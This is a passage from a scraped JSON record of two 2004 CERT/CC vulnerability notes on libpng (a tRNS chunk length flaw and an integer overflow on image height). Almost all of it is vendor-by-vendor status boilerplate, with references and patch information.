vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### SuSE Inc. Affected\n\nNotified: July 16, 2004 Updated: July 27, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### Trustix Secure Linux Affected\n\nUpdated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### libpng.org __ Affected\n\nNotified: July 16, 2004 Updated: August 04, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThis issue has been resolved in libpng version [1.2.6rc1](<http://sourceforge.net/project/showfiles.php?group_id=5624&package_id=5683&release_id=258107>) (release candidate 1). An older version of libpng containing the backported fixes, [1.0.16rc1](<http://sourceforge.net/project/showfiles.php?group_id=5624&package_id=5683&release_id=258106>), is also available.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### Juniper Networks __ Not Affected\n\nNotified: July 16, 2004 Updated: July 27, 2004 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nJuniper Networks products are not susceptible to this vulnerability.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### NEC Corporation __ Not Affected\n\nNotified: July 16, 2004 Updated: August 02, 2004 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`sent on August 2, 2004` \n \n`[Software Products]` \n \n` * E-mail client software \"WeMail\"` \n` (shareware developped by NEC Communication Systems,Ltd.)` \n` - is NOT vulnerable.` \n` It does not include any code originated from libPNG.` \n \n` * We continue to try to investigate other products possibly affected` \n` by these vulnerabilities.`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### BSDI Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### Conectiva Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### Cray Inc. Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### Debian Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### Engarde Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### FreeBSD Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### Fujitsu Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### Hewlett-Packard Company Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### Hitachi Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### IBM Unknown\n\nNotified: July 16, 2004 Updated: July 30, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### IBM eServer Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### IBM-zSeries Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### IMmunix Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### Ingrian Networks Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### MandrakeSoft Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### NETBSD Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### Nokia Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### Novell Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### Openwall GNU/*/Linux Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### Red Hat Inc. Unknown\n\nNotified: July 16, 2004 Updated: July 27, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### SGI Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### ScO Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### Sequent Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### Sony Corporation Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### Sun Microsystems Inc. Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### TurboLinux Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### Wind River Systems Inc. Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### eMC Corporation Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### uNisys Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\nView all 40 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://scary.beasts.org/security/CESA-2004-001.txt>\n * <http://www.libpng.org/pub/png/>\n * <http://libpng.sourceforge.net/>\n * <http://www.libpng.org/pub/png/spec/1.2/PNG-Chunks.html>\n * <http://www.microsoft.com/technet/security/Bulletin/MS05-009.mspx>\n\n### Acknowledgements\n\nThanks to Chris Evans for reporting this vulnerability.\n\nThis document was written by Chad Dougherty and Damon Morda.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2004-0597](<http://web.nvd.nist.gov/vuln/detail/CVE-2004-0597>) \n---|--- \n**Severity Metric:** | 20.11 \n**Date Public:** | 2004-08-04 \n**Date First Published:** | 2004-08-04 \n**Date Last Updated: ** | 2005-06-14 20:58 UTC \n**Document Revision: ** | 39 \n", "modified": "2005-06-14T20:58:00", "published": "2004-08-04T00:00:00", "id": "VU:388984", "href": "https://www.kb.cert.org/vuls/id/388984", "type": "cert", "title": "libpng fails to properly check length of transparency chunk (tRNS) data", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-18T20:43:46", "bulletinFamily": "info", "cvelist": ["CVE-2004-0599"], "description": "### Overview \n\nThe Portable Network Graphics library ([libpng](<http://www.libpng.org/pub/png/libpng.html>)) contains a remotely exploitable vulnerability which could cause affected applications to crash.\n\n### Description \n\nThe Portable Network Graphics ([PNG](<http://www.libpng.org/pub/png/spec/1.2/PNG-Contents.html>)[](<http://www.libpng.org/pub/png/>)) image format is used as an alternative to other image formats such as the Graphics Interchange Format (GIF). The libpng reference library is available for application developers to support the PNG image format.\n\nAn integer overflow error exists in the handling of PNG image height within the `png_read_png()` function. As a result, a PNG image with excessive height may cause an integer overflow on a memory allocation and could cause the affected application to crash. \n \nMultiple applications support the PNG image format including web browsers, email clients, and various graphic utilities. Because multiple products have used the libpng reference library to implement native PNG image processing, multiple applications will be affected by this issue in different ways. \n \n--- \n \n### Impact \n\nAn attacker could cause a vulnerable application to crash by supplying a specially-crafted PNG image. Vulnerable applications that read images from network sources could be exploited remotely. \n \n--- \n \n### Solution \n\n**Apply a patch from the vendor** \n \nPatches have been released to address this vulnerability. Please see the Systems Affected section of this document for more details. \n \n--- \n \n### Vendor Information\n\n160448\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Apple Computer Inc. Affected\n\nNotified: July 16, 2004 Updated: August 04, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### MontaVista Software Affected\n\nNotified: July 16, 2004 Updated: August 04, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### libpng.org __ Affected\n\nNotified: July 16, 2004 Updated: August 04, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThis issue has been resolved in libpng version [1.2.6rc1](<http://sourceforge.net/project/showfiles.php?group_id=5624&package_id=5683&release_id=258107>) (release candidate 1). An older version of libpng containing the backported fixes, [1.0.16rc1](<http://sourceforge.net/project/showfiles.php?group_id=5624&package_id=5683&release_id=258106>), is also available.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### IBM __ Not Affected\n\nNotified: July 16, 2004 Updated: August 04, 2004 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`The AIX Operating System is not vulnerable to the issues discussed in CERT Vulnerability Notes VU#817368, VU#236656, VU#477512, VU#160448 and VU#286464.`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### Juniper Networks __ Not Affected\n\nNotified: July 16, 2004 Updated: July 23, 2004 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`Juniper Networks products are not susceptible to this vulnerability`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### NEC Corporation __ Not Affected\n\nNotified: July 16, 2004 Updated: August 03, 2004 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`sent on August 2, 2004 \n \n[Software Products] \n \n* E-mail client software \"WeMail\" \n(shareware developped by NEC Communication Systems,Ltd.) \n- is NOT vulnerable. \nIt does not include any code originated from libPNG. \n \n* We continue to try to investigate other products possibly affected \nby these vulnerabilities. \n`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### BSDI Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### Conectiva Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### Cray Inc. Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### Debian Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### Engarde Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### FreeBSD Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### Fujitsu Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### Hewlett-Packard Company Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### Hitachi Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### IBM eServer Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### IBM-zSeries Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### IMmunix Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### Ingrian Networks Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### MandrakeSoft Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### Microsoft Corporation Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### NETBSD Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### Nokia Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### Novell Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### Openwall GNU/*/Linux Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### Red Hat Inc. Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### SCO Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### SGI Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe 